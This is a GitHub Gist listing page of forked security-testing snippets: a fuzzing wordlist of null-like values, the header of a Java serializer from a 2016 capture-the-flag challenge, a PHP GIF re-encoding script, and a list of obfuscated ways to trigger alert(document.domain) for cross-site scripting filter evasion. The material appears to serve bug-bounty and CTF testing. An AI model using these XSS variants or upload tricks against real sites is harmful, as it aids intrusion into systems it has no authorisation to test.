Skip to content

Instantly share code, notes, and snippets.

@ggulgun
ggulgun / fuzz.txt
Created July 4, 2020 14:15 — forked from m4ll0k/fuzz.txt
fuzz wordlist
undefined
undef
null
NULL
(null)
nil
NIL
true
false
True
@ggulgun
ggulgun / Main.java
Created April 17, 2020 21:50 — forked from 0xBADCA7/Main.java
Simple Java object serializer
/*
* *
* * @0xBADCA7 and github/0xBADCA7
* * How to serialize Java objects. This is from TUCTF 2016.
* *
* * Just compile on the command line (IDE will taint serialization and place package identifiers):
* * javac Main.java && java Main && cat /tmp/serialized.bin
* *
* * */
<?php
//php gd-gif.php image.gif gd-image.gif
$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
imagedestroy($gif);
?>
@ggulgun
ggulgun / alert.js
Created March 5, 2020 21:15 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);